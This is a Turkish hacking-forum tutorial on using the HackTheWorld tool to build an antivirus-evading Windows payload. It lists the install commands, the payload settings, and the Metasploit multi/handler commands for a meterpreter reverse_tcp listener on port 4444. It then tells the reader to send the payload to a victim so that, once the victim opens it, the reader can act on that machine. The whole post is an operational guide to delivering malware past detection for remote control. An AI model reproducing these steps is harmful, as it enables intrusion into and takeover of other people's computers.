HackTheWorld ile Antivirüslere Yakalanmayın // Qwx

Qwx

Kıdemli Üye
30 Nis 2012
2,728
13
HackTheWorld

HackTheWorld, python ile yazılmış olan bu araç tüm antivirüsleri atlamak için kullanılmaktadır.

Öncelikle aracımızı sistemimize indiriyoruz.
git clone https://github.com/stormshadow07/HackTheWorld.git

gitclone.jpg


Aracımızı indirdikten sonra cd HackTheWorld komutu ile klasöre giriş yapıyoruz.
Ardından chmod +x install.sh komutu ile yetkilendirme işlemini yapıyoruz.

chmod.jpg


Yetkilendirme işleminin ardından kurulum işlemine geçiyoruz.
Kurulum sırasında bizim sistemimizde önceden kurulu olması gereken 3 adet araç istemektedir. Bunlar Msfvenom, Wine ve Mingw-w64'tür. Eğer ki sisteminizde bu araçlardan bir ve/veya birkaçı yok ise bu şekilde sisteminize indirebilirsiniz.
Wine için; apt-get install wine-bin:i386
Mingw-w64 için; apt-get install mingw-w64 -y

eksiming.jpg


Kurulum işlemi internet hızınıza göre değişiklik gösterecektir;

mingw.jpg


Gereksinimleri tamamlandıktan sonra tekrardan aracımızın kurulum işlemine geçiyoruz.
./install.sh komutunu girdikten sonra üç gereksinimde yeşil olduğunu görüyoruz ve bizlere çalıştırmak adına komutu belirtmiştir.

kurulumtamam.jpg


Aracımızı python HackTheWorld.py komutu ile çalıştırıyoruz.

normal.jpg


Çalıştırdıktan sonra bizlere Payload tipini sormaktadır, TCP protokolünü seçiyorum. Protokol seçim işleminin ardından araç bizim Local Host'umuzu sormaktadır. Local Host'u öğrenmek adına terminale ifconfig komutunu yazıyoruz. İnternete bağlanmış olduğunuz cihaz wireless ise wlan* kısmında usb ise usb* kısmında ethernet ise eth* kısmında local host ip'nizi bulabilirsiniz.

ifconfig.jpg


Local Host'umuzu yazdıktan sonra Local Port tanımlamasını yapmamız istenmektedir 4444 numaralı TCP bağlantı noktamızı yazıyoruz. Ardından anahtar kelimemizi girip Windows Defender'dan geçmesini istiyorsak 1 istemiyorsak 0 yazıyoruz 1 olarak tamamlamanız daha doğru bir hareket olacaktır ve payloadımızı oluşturmayı tamamlıyoruz.

ggez.jpg


Payloadımızı başarılı bir şekilde oluşturduk ve bu payloadımızı dinleme işlemine geçiyoruz. Dinleme işlemini başlatmak için Métasploit aracımızı çalıştırıyoruz msfconsole ve sırasıyla ilgili komutları giriyoruz.
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <localhostip>

set LPORT 4444
exploit


mmm.jpg


Dinleme işlemini tamamladıktan sonra oluşturduğumuz payloadı kurbana yolluyoruz.
Kurban bizim oluşturduğumuz payload'ı açtığı zaman Métasploit aracı ile istekleriniz doğrultusunda eylemlere gidebilirsiniz.

gg.jpg

 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.